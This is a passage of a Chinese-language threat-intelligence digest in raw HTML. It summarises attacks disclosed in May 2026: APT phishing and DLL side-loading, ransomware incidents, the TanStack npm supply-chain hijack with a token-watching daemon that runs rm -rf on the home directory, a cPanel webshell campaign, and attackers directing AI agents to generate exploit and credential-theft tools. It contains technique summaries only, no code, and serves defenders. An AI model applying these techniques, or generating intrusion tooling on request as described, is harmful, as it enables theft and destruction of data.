style="text-align: left;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">披露时间：</span></strong><span leaf="">2026年5月13日</span></p><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">情报来源：</span></strong><span leaf=""><a href="https://harfanglab.io/insidethelab/gamaredon-gammadrop-gammaload/" target="_blank">https://harfanglab.io/insidethelab/gamaredon-gammadrop-gammaload/</a></span></p><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">相关信息：</span></strong></p></div><div style="text-align: left;box-sizing: border-box;"><p style="text-indent: 2.1333em;word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">Gamaredon组织自2025年9月起利用CVE-2025-8088路径遍历漏洞，通过伪造或劫持的乌克兰政府邮箱发送鱼叉邮件，附件中的RAR压缩包将恶意VBScript释放到启动文件夹实现持久化。第一阶段GammaDrop从Cloudflare Workers获取GammaLoad（HTA），后者作为C2信标收集计算机名、卷序列号等信息，使用User-Agent嵌入受害标识并循环请求，若主C2无响应则回退至备用域名，最终可选择性下发下一阶段载荷。该活动截至2026 年 5 月仍处于活跃状态，高度针对乌克兰国家安全机构。</span></p></div><div style="margin: 10px 0%;display: flex;flex-flow: row;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;flex: 11.2687 11.2687 0%;height: auto;background-color: rgb(55, 113, 187);line-height: 1;letter-spacing: 0px;border-width: 0px;border-radius: 3px;border-style: none;border-color: rgb(62, 62, 62);overflow: hidden;align-self: center;box-sizing: border-box;"><div style="margin: 2px 0%;box-sizing: border-box;"><div style="color: rgb(255, 255, 255);line-height: 1;letter-spacing: 0px;text-align: right;padding: 0px 3px;box-sizing: border-box;"><p style="text-indent: 0em;text-align: center;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">06</span></strong></p></div></div></div><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 100 100 0%;height: auto;line-height: 0;box-sizing: border-box;"><div style="margin: 0px 0%;transform: translate3d(2px, 0px, 0px);-webkit-transform: translate3d(2px, 0px, 0px);-moz-transform: translate3d(2px, 0px, 0px);-o-transform: translate3d(2px, 0px, 0px);box-sizing: border-box;"><div style="line-height: 1.5;letter-spacing: 1px;padding: 0px 6px;box-sizing: border-box;"><p style="margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">Seedworm 入侵韩国电子制造商</span></strong></p></div></div></div></div><div style="text-align: left;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">披露时间：</span></strong><span leaf="">2026年5月12日</span></p><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">情报来源：</span></strong><span leaf=""><a href="https://www.security.com/threat-intelligence/iran-seedworm-electronics" target="_blank">https://www.security.com/threat-intelligence/iran-seedworm-electronics</a></span></p><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">相关信息：</span></strong></p></div><div style="text-align: left;box-sizing: border-box;"><p style="text-indent: 2.1333em;word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">伊朗关联的APT组织Seedworm在2026年第一季度针对全球至少九个组织实施间谍活动，涉及韩国电子制造商、中东政府机构、东南亚工业制造、拉丁美洲金融等多个领域。攻击者利用合法签名的Fortemedia和SentinelOne二进制文件进行DLL侧载，通过Node.js脚本和PowerShell执行侦查、截图、SAM劫持、权限提升及SOCKS5隧道，并将窃取的数据通过公共文件传输服务sendit.sh外泄。</span></p></div><div style="text-align: center;justify-content: center;display: flex;flex-flow: row;margin: 10px 0% 20px;box-sizing: border-box;"><div style="display: inline-block;width: auto;vertical-align: top;min-width: 10%;max-width: 100%;flex: 0 0 auto;height: auto;align-self: stretch;padding: 0px 10px;border-style: solid;border-width: 0px;border-color: rgb(62, 62, 62);box-sizing: border-box;"><div style="display: flex;flex-flow: row;margin: 0px 0% -9px;justify-content: center;box-sizing: border-box;"><div style="display: inline-block;vertical-align: top;width: auto;flex: 100 100 0%;align-self: flex-start;height: auto;line-height: 0;box-sizing: border-box;"><div style="text-align: left;justify-content: flex-start;margin: 0px 0%;transform: translate3d(-7px, 0px, 0px);-webkit-transform: translate3d(-7px, 0px, 0px);-moz-transform: translate3d(-7px, 0px, 0px);-o-transform: translate3d(-7px, 0px, 0px);display: flex;flex-flow: row;box-sizing: border-box;"><div style="display: inline-block;width: 10px;vertical-align: top;flex: 0 0 auto;height: auto;line-height: 0;background-color: rgb(55, 113, 187);align-self: flex-start;box-sizing: border-box;"><div style="text-align: center;margin: 0px 0%;line-height: 0;box-sizing: border-box;"><p style="max-width: 100%;vertical-align: middle;display: inline-block;line-height: 0;box-sizing: border-box;" nodeleaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="1" data-s="300,640" data-type="gif" data-w="300" style="vertical-align: middle;max-width: 100%;width: 100%;box-sizing: border-box;" data-imgfileid="100035151" src="https://wechat2rss.xlab.app/img-proxy/?k=41400d8c&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_gif%2FodcL3w4qOq99eEMB0NIwAmmwCcaGlmodEwavSx8zic0dAtGibwXngXkkGCNz0uMLdtvsE7g2QWTmE3OrgRamFmRxKtzFfmaYXGSPiaSeHkAVww%2F640%3Fwx_fmt%3Dgif%26from%3Dappmsg"/></p></div></div></div></div><div style="display: inline-block;vertical-align: top;width: auto;align-self: flex-start;flex: 100 100 0%;line-height: 0;letter-spacing: 0px;box-sizing: border-box;"><div style="transform: perspective(0px);-webkit-transform: perspective(0px);-moz-transform: perspective(0px);-o-transform: perspective(0px);transform-style: flat;box-sizing: border-box;"><div style="text-align: left;justify-content: flex-start;transform: translate3d(7px, 0px, 0px) rotateY(180deg);-webkit-transform: translate3d(7px, 0px, 0px) rotateY(180deg);-moz-transform: translate3d(7px, 0px, 0px) rotateY(180deg);-o-transform: translate3d(7px, 0px, 0px) rotateY(180deg);display: flex;flex-flow: row;box-sizing: border-box;"><div style="display: inline-block;width: 10px;vertical-align: top;flex: 0 0 auto;height: auto;line-height: 0;background-color: rgb(55, 113, 187);align-self: flex-start;box-sizing: border-box;"><div style="text-align: center;margin: 0px 0%;line-height: 0;box-sizing: border-box;"><p style="max-width: 100%;vertical-align: middle;display: inline-block;line-height: 0;box-sizing: border-box;" nodeleaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="1" data-s="300,640" data-type="gif" data-w="300" style="vertical-align: middle;max-width: 100%;width: 100%;box-sizing: border-box;" data-imgfileid="100035149" src="https://wechat2rss.xlab.app/img-proxy/?k=c5094622&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_gif%2FodcL3w4qOqib62icAq1TEU75hDHArl57bNib0iagHiaeAiaqVPZZclIY26LprGzgoyR2NiabkNGxT5zNVeSes0t1wLD4iaoggpT32F3QVVyvK5Km1BM%2F640%3Fwx_fmt%3Dgif%26from%3Dappmsg"/></p></div></div></div></div></div></div><div style="display: flex;flex-flow: row;margin: 0px 0%;justify-content: center;box-sizing: border-box;"><div style="display: inline-block;width: auto;vertical-align: top;flex: 100 100 0%;align-self: flex-start;height: auto;z-index: 2;margin: 0px;padding: 3px 6px;box-sizing: border-box;"><div style="font-size: 18px;color: rgb(55, 113, 187);line-height: 1.8;letter-spacing: 1.8px;padding: 0px;text-align: justify;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">攻击行动或事件情报</span></strong></p></div></div></div><div style="transform: perspective(0px);-webkit-transform: perspective(0px);-moz-transform: perspective(0px);-o-transform: perspective(0px);transform-style: flat;box-sizing: border-box;"><div style="display: flex;flex-flow: row;margin: -10px 0% 0px;transform: rotateX(180deg);-webkit-transform: rotateX(180deg);-moz-transform: rotateX(180deg);-o-transform: rotateX(180deg);justify-content: center;box-sizing: border-box;"><div style="display: inline-block;vertical-align: top;width: auto;flex: 100 100 0%;align-self: flex-start;height: auto;line-height: 0;box-sizing: border-box;"><div style="text-align: left;justify-content: flex-start;margin: 0px 0% 1px;transform: translate3d(-7px, 0px, 0px);-webkit-transform: translate3d(-7px, 0px, 0px);-moz-transform: translate3d(-7px, 0px, 0px);-o-transform: translate3d(-7px, 0px, 0px);display: flex;flex-flow: row;box-sizing: border-box;"><div style="display: inline-block;width: 10px;vertical-align: top;flex: 0 0 auto;height: auto;line-height: 0;background-color: rgb(55, 113, 187);align-self: flex-start;box-sizing: border-box;"><div style="text-align: center;margin: 0px 0%;line-height: 0;box-sizing: border-box;"><p style="max-width: 100%;vertical-align: middle;display: inline-block;line-height: 0;box-sizing: border-box;" nodeleaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="1" data-s="300,640" data-type="gif" data-w="300" style="vertical-align: middle;max-width: 100%;width: 100%;box-sizing: border-box;" data-imgfileid="100035150" src="https://wechat2rss.xlab.app/img-proxy/?k=d3073d55&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_gif%2FodcL3w4qOqibIiarHfS826IicA1UwonSquO8C92HgiasKqCdQPB3davialUfOH6cwAz6jELhtHznibYVnicKaNnQRpicVyadOvNhga6bCP8msp93seY%2F640%3Fwx_fmt%3Dgif%26from%3Dappmsg"/></p></div></div></div></div><div style="display: inline-block;vertical-align: top;width: auto;align-self: flex-start;flex: 100 100 0%;line-height: 0;letter-spacing: 0px;box-sizing: border-box;"><div style="transform: perspective(0px);-webkit-transform: perspective(0px);-moz-transform: perspective(0px);-o-transform: perspective(0px);transform-style: flat;box-sizing: border-box;"><div style="text-align: left;justify-content: flex-start;transform: translate3d(7px, 0px, 0px) rotateY(180deg);-webkit-transform: translate3d(7px, 0px, 0px) rotateY(180deg);-moz-transform: translate3d(7px, 0px, 0px) rotateY(180deg);-o-transform: translate3d(7px, 0px, 0px) rotateY(180deg);display: flex;flex-flow: row;box-sizing: border-box;"><div style="display: inline-block;width: 10px;vertical-align: top;flex: 0 0 auto;height: auto;line-height: 0;background-color: rgb(55, 113, 187);align-self: flex-start;box-sizing: border-box;"><div style="text-align: center;margin: 0px 0%;line-height: 0;box-sizing: border-box;"><p style="max-width: 100%;vertical-align: middle;display: inline-block;line-height: 0;box-sizing: border-box;" nodeleaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="1" data-s="300,640" data-type="gif" data-w="300" style="vertical-align: middle;max-width: 100%;width: 100%;box-sizing: border-box;" data-imgfileid="100035148" src="https://wechat2rss.xlab.app/img-proxy/?k=c05808a3&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_gif%2FodcL3w4qOq9OtudJqJAeGSw824OJ1giaRvEdFpmad5vlK3abuAnbyodiavpr9Ric8Mibyic4Uc6Y78cJyUVy76xibsiamDmHWxUDibce80QILtfaUp8%2F640%3Fwx_fmt%3Dgif%26from%3Dappmsg"/></p></div></div></div></div></div></div></div></div></div><div style="margin: 10px 0%;display: flex;flex-flow: row;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;flex: 11.2687 11.2687 0%;height: auto;background-color: rgb(55, 113, 187);line-height: 1;letter-spacing: 0px;border-width: 0px;border-radius: 3px;border-style: none;border-color: rgb(62, 62, 62);overflow: hidden;align-self: center;box-sizing: border-box;"><div style="margin: 2px 0%;box-sizing: border-box;"><div style="color: rgb(255, 255, 255);line-height: 1;letter-spacing: 0px;text-align: right;padding: 0px 3px;box-sizing: border-box;"><p style="text-indent: 0em;text-align: center;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">01</span></strong></p></div></div></div><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 100 100 0%;height: auto;line-height: 0;box-sizing: border-box;"><div style="margin: 0px 0%;transform: translate3d(2px, 0px, 0px);-webkit-transform: translate3d(2px, 0px, 0px);-moz-transform: translate3d(2px, 0px, 0px);-o-transform: translate3d(2px, 0px, 0px);box-sizing: border-box;"><div style="line-height: 1.5;letter-spacing: 1px;padding: 0px 6px;box-sizing: border-box;"><p style="margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">两项人工智能增强型威胁活动瞄准拉丁美洲政府和金融部门</span></strong></p></div></div></div></div><div style="text-align: left;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">披露时间：</span></strong><span leaf="">2026年5月11日</span></p><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">情报来源：</span></strong><span leaf=""><a href="https://www.trendmicro.com/en_us/research/26/e/vibe-hacking-two-ai-augmented-campaigns-target-government-and-financial-sectors-in-latin-america.html" target="_blank">https://www.trendmicro.com/en_us/research/26/e/vibe-hacking-two-ai-augmented-campaigns-target-government-and-financial-sectors-in-latin-america.html</a></span></p><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">相关信息：</span></strong></p></div><div style="text-align: left;box-sizing: border-box;"><p style="text-indent: 2.1333em;word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">两个拉丁美洲攻击活动SHADOW-AETHER-040和SHADOW-AETHER-064分别针对政府与金融机构，均利用AI代理辅助入侵。攻击者通过ProxyChains和SSH隧道建立流量通道，命令AI代理动态生成扫描、漏洞利用、凭据收集等工具和脚本，而非依赖预置黑客工具。前者使用西班牙语，部署了AI生成的Python后门implante_http；后者使用葡萄牙语，开发了SOCKTZ隧道工具。AI辅助攻击能够快速分析配置文件和日志，动态生成绕过传统检测的恶意代码，提升攻击效率。</span></p></div><div style="text-align: center;margin-top: 10px;margin-bottom: 10px;line-height: 0;box-sizing: border-box;"><p style="max-width: 100%;vertical-align: middle;display: inline-block;line-height: 0;box-sizing: border-box;" nodeleaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.8172531214528944" data-s="300,640" data-type="png" data-w="881" style="vertical-align: middle;max-width: 100%;width: 100%;box-sizing: border-box;" data-imgfileid="100035152" src="https://wechat2rss.xlab.app/img-proxy/?k=eb1d78be&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FodcL3w4qOq9zC9qFErs0AeicT5sFBdiawGfDKCB2dLsibKwDQpQiaicQYgreKiaO1QIqnV0rE84QBhpNXZxfI23FurBA7voneczAcAuwY4N1Pf2eY%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p></div><div style="margin: 10px 0%;display: flex;flex-flow: row;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;flex: 11.2687 11.2687 0%;height: auto;background-color: rgb(55, 113, 187);line-height: 1;letter-spacing: 0px;border-width: 0px;border-radius: 3px;border-style: none;border-color: rgb(62, 62, 62);overflow: hidden;align-self: center;box-sizing: border-box;"><div style="margin: 2px 0%;box-sizing: border-box;"><div style="color: rgb(255, 255, 255);line-height: 1;letter-spacing: 0px;text-align: right;padding: 0px 3px;box-sizing: border-box;"><p style="text-indent: 0em;text-align: center;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">02</span></strong></p></div></div></div><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 100 100 0%;height: auto;line-height: 0;box-sizing: border-box;"><div style="margin: 0px 0%;transform: translate3d(2px, 0px, 0px);-webkit-transform: translate3d(2px, 0px, 0px);-moz-transform: translate3d(2px, 0px, 0px);-o-transform: translate3d(2px, 0px, 0px);box-sizing: border-box;"><div style="line-height: 1.5;letter-spacing: 1px;padding: 0px 6px;box-sizing: border-box;"><p style="margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">富士康证实遭到Nitrogen勒索软件团伙的网络攻击</span></strong></p></div></div></div></div><div style="text-align: left;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">披露时间：</span></strong><span leaf="">2026年5月13日</span></p><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">情报来源：</span></strong><span leaf=""><a href="https://www.bleepingcomputer.com/news/security/electronics-giant-foxconn-confirms-cyberattack-on-north-american-factories/" target="_blank">https://www.bleepingcomputer.com/news/security/electronics-giant-foxconn-confirms-cyberattack-on-north-american-factories/</a></span></p><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">相关信息：</span></strong></p></div><div style="text-align: left;box-sizing: border-box;"><p style="text-indent: 2.1333em;word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">2026 年 5 月 13 日，全球最大电子代工厂富士康确认其北美厂区遭Nitrogen 勒索软件团伙网络攻击，该团伙宣称窃取8TB 数据、超 1100 万份文档，涉及苹果、英特尔、谷歌、英伟达等客户机密资料；富士康已启动应急响应，受影响厂区正逐步恢复生产，这也是富士康近年第三次遭遇重大勒索软件攻击。</span></p></div><div style="margin: 10px 0%;display: flex;flex-flow: row;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;flex: 11.2687 11.2687 0%;height: auto;background-color: rgb(55, 113, 187);line-height: 1;letter-spacing: 0px;border-width: 0px;border-radius: 3px;border-style: none;border-color: rgb(62, 62, 62);overflow: hidden;align-self: center;box-sizing: border-box;"><div style="margin: 2px 0%;box-sizing: border-box;"><div style="color: rgb(255, 255, 255);line-height: 1;letter-spacing: 0px;text-align: right;padding: 0px 3px;box-sizing: border-box;"><p style="text-indent: 0em;text-align: center;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">03</span></strong></p></div></div></div><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 100 100 0%;height: auto;line-height: 0;box-sizing: border-box;"><div style="margin: 0px 0%;transform: translate3d(2px, 0px, 0px);-webkit-transform: translate3d(2px, 0px, 0px);-moz-transform: translate3d(2px, 0px, 0px);-o-transform: translate3d(2px, 0px, 0px);box-sizing: border-box;"><div style="line-height: 1.5;letter-spacing: 1px;padding: 0px 6px;box-sizing: border-box;"><p style="margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">42个TanStack包遭供应链劫持：6分钟植入84个恶意版本</span></strong></p></div></div></div></div><div style="text-align: left;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">披露时间：</span></strong><span leaf="">2026年5月13日</span></p><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">情报来源：</span></strong><span leaf=""><a href="https://mp.weixin.qq.com/s/3VT15mDrwYQtJ4xgq_mB6w" target="_blank">https://mp.weixin.qq.com/s/3VT15mDrwYQtJ4xgq_mB6w</a></span></p><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">相关信息：</span></strong></p></div><div style="text-align: left;box-sizing: border-box;"><p style="text-indent: 2.1333em;word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">攻击者利用GitHub Actions的pull_request_target工作流、缓存中毒及OIDC令牌内存提取技术，在6分钟内劫持TanStack的42个npm包发布管道，植入84个恶意版本。恶意载荷router_init.js窃取开发者凭证，并通过@tanstack/setup的prepare钩子实现持久化，同时部署gh-token-monitor守护进程，在检测到令牌撤销时执行rm -rf删除主目录。攻击归因于TeamPCP组织，影响波及React Router等周下载量超千万的核心包，并扩展至PyPI生态。</span></p></div><div style="margin: 10px 0%;display: flex;flex-flow: row;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;flex: 11.2687 11.2687 0%;height: auto;background-color: rgb(55, 113, 187);line-height: 1;letter-spacing: 0px;border-width: 0px;border-radius: 3px;border-style: none;border-color: rgb(62, 62, 62);overflow: hidden;align-self: center;box-sizing: border-box;"><div style="margin: 2px 0%;box-sizing: border-box;"><div style="color: rgb(255, 255, 255);line-height: 1;letter-spacing: 0px;text-align: right;padding: 0px 3px;box-sizing: border-box;"><p style="text-indent: 0em;text-align: center;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">04</span></strong></p></div></div></div><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 100 100 0%;height: auto;line-height: 0;box-sizing: border-box;"><div style="margin: 0px 0%;transform: translate3d(2px, 0px, 0px);-webkit-transform: translate3d(2px, 0px, 0px);-moz-transform: translate3d(2px, 0px, 0px);-o-transform: translate3d(2px, 0px, 0px);box-sizing: border-box;"><div style="line-height: 1.5;letter-spacing: 1px;padding: 0px 6px;box-sizing: border-box;"><p style="margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">Gentlemen 勒索软件遭到入侵</span></strong></p></div></div></div></div><div style="text-align: left;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">披露时间：</span></strong><span leaf="">2026年5月13日</span></p><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">情报来源：</span></strong><span leaf=""><a href="https://research.checkpoint.com/2026/thus-spoke-the-gentlemen/" target="_blank">https://research.checkpoint.com/2026/thus-spoke-the-gentlemen/</a></span></p><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">相关信息：</span></strong></p></div><div style="text-align: left;box-sizing: border-box;"><p style="text-indent: 2.1333em;word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">The Gentlemen勒索软件即服务运营的内部数据库遭泄露，曝光了管理员Zeta88（又称hastalamuerte）及至少8个关联分支机构的TOX ID。泄露的聊天记录揭示了该组织的操作流程：通过Fortinet和Cisco边缘设备、NTLM中继等初始访问，使用NetExec、RelayKing等工具集进行横向移动和权限提升，利用CVE-2024-55591、CVE-2025-32433等漏洞，结合EDR绕过和日志篡改技术，最终部署勒索软件。谈判中曾获19万美元赎金，并利用从英国软件咨询公司窃取的数据进一步攻击土耳其企业。</span></p></div><div style="text-align: center;margin-top: 10px;margin-bottom: 10px;line-height: 0;box-sizing: border-box;"><p style="max-width: 100%;vertical-align: middle;display: inline-block;line-height: 0;box-sizing: border-box;" nodeleaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.7834051724137931" data-s="300,640" data-type="png" data-w="928" style="vertical-align: middle;max-width: 100%;width: 100%;box-sizing: border-box;" data-imgfileid="100035156" src="https://wechat2rss.xlab.app/img-proxy/?k=d1ca8654&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FodcL3w4qOq8aPLrK6X8YvG9iaicJFcWKZRyqb2oS5ibffLjILAWZJR7reDYUrwXA3icW2GXaEHs1M3sxLXkkOVsZeiajcO94F6FXA08W6iaqSWnI4%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p></div><div style="margin: 10px 0%;display: flex;flex-flow: row;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;flex: 11.2687 11.2687 0%;height: auto;background-color: rgb(55, 113, 187);line-height: 1;letter-spacing: 0px;border-width: 0px;border-radius: 3px;border-style: none;border-color: rgb(62, 62, 62);overflow: hidden;align-self: center;box-sizing: border-box;"><div style="margin: 2px 0%;box-sizing: border-box;"><div style="color: rgb(255, 255, 255);line-height: 1;letter-spacing: 0px;text-align: right;padding: 0px 3px;box-sizing: border-box;"><p style="text-indent: 0em;text-align: center;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">05</span></strong></p></div></div></div><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 100 100 0%;height: auto;line-height: 0;box-sizing: border-box;"><div style="margin: 0px 0%;transform: translate3d(2px, 0px, 0px);-webkit-transform: translate3d(2px, 0px, 0px);-moz-transform: translate3d(2px, 0px, 0px);-o-transform: translate3d(2px, 0px, 0px);box-sizing: border-box;"><div style="line-height: 1.5;letter-spacing: 1px;padding: 0px 6px;box-sizing: border-box;"><p style="margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">秘密活动6年的神秘黑客组织Mr_Rot13正在利用cPanel高危漏洞部署后门木马</span></strong></p></div></div></div></div><div style="text-align: left;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">披露时间：</span></strong><span leaf="">2026年5月11日</span></p><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">情报来源：</span></strong><span leaf=""><a href="https://blog.xlab.qianxin.com/mr_rot13-the-elusive-6-year-hacker-group-weaponizing-critical-cpanel-flaws-for-backdoor-deployment_cn/" target="_blank">https://blog.xlab.qianxin.com/mr_rot13-the-elusive-6-year-hacker-group-weaponizing-critical-cpanel-flaws-for-backdoor-deployment_cn/</a></span></p><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">相关信息：</span></strong></p></div><div style="text-align: left;box-sizing: border-box;"><p style="text-indent: 2.1333em;word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">一个名为Mr_Rot13的神秘黑客组织已秘密活动六年，近期利用cPanel高危漏洞CVE-2026-41940部署后门木马。该组织使用Go编写的Payload感染器修改系统密码、植入SSH公钥、PHP Webshell及Rot13编码的恶意JS脚本以窃取登录凭证，并部署跨平台远控Filemanager，同时将窃取的系统信息回传至C2服务器和Telegram群组。该组织基础设施自2020年起长期保持低检测率，至今仍未被完全揭露。</span></p></div><div style="margin: 10px 0%;display: flex;flex-flow: row;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;flex: 11.2687 11.2687 0%;height: auto;background-color: rgb(55, 113, 187);line-height: 1;letter-spacing: 0px;border-width: 0px;border-radius: 3px;border-style: none;border-color: rgb(62, 62, 62);overflow: hidden;align-self: center;box-sizing: border-box;"><div style="margin: 2px 0%;box-sizing: border-box;"><div style="color: rgb(255, 255, 255);line-height: 1;letter-spacing: 0px;text-align: right;padding: 0px 3px;box-sizing: border-box;"><p style="text-indent: 0em;text-align: center;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">06</span></strong></p></div></div></div><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 100 100 0%;height: auto;line-height: 0;box-sizing: border-box;"><div style="margin: 0px 0%;transform: translate3d(2px, 0px, 0px);-webkit-transform: translate3d(2px, 0px, 0px);-moz-transform: translate3d(2px, 0px, 0px);-o-transform: translate3d(2px, 0px, 0px);box-sizing: border-box;"><div style="line-height: 1.5;letter-spacing: 1px;padding: 0px 6px;box-sizing: border-box;"><p style="margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">某加密IM官网供应链事件，“离岸”爱国者卷土重来</span></strong></p></div></div></div></div><div style="text-align: left;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">披露时间：</span></strong><span leaf="">2026年5月5日</span></p><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">情报来源：</span></strong><span leaf=""><a href="https://mp.weixin.qq.com/s/KBUCVEVLF-cMR4ePHBRw2w" target="_blank">https://mp.weixin.qq.com/s/KBUCVEVLF-cMR4ePHBRw2w</a></span></p><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">相关信息：</span></strong></p></div><div style="text-align: left;box-sizing: border-box;"><p style="text-indent: 2.1333em;word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">攻击者替换某加密即时通讯软件的官方安装包，释放恶意组件并内存加载SNOWLIGHT下载者，最终运行魔改的nps隧道以建立隐蔽通道。该活动涉及Windows和Linux平台，利用SQL爆破、漏洞入侵、钓鱼LNK等方式分发载荷，并结合浏览器窃密、内网扫描、权限提升等工具，形成持续渗透能力。</span></p></div><div style="text-align: center;justify-content: center;display: flex;flex-flow: row;margin: 10px 0% 20px;box-sizing: border-box;"><div style="display: inline-block;width: auto;vertical-align: top;min-width: 10%;max-width: 100%;flex: 0 0 auto;height: auto;align-self: stretch;padding: 0px 10px;border-style: solid;border-width: 0px;border-color: rgb(62, 62, 62);box-sizing: border-box;"><div style="display: flex;flex-flow: row;margin: 0px 0% -9px;justify-content: center;box-sizing: border-box;"><div style="display: inline-block;vertical-align: top;width: auto;flex: 100 100 0%;align-self: flex-start;height: auto;line-height: 0;box-sizing: border-box;"><div style="text-align: left;justify-content: flex-start;margin: 0px 0%;transform: translate3d(-7px, 0px, 0px);-webkit-transform: translate3d(-7px, 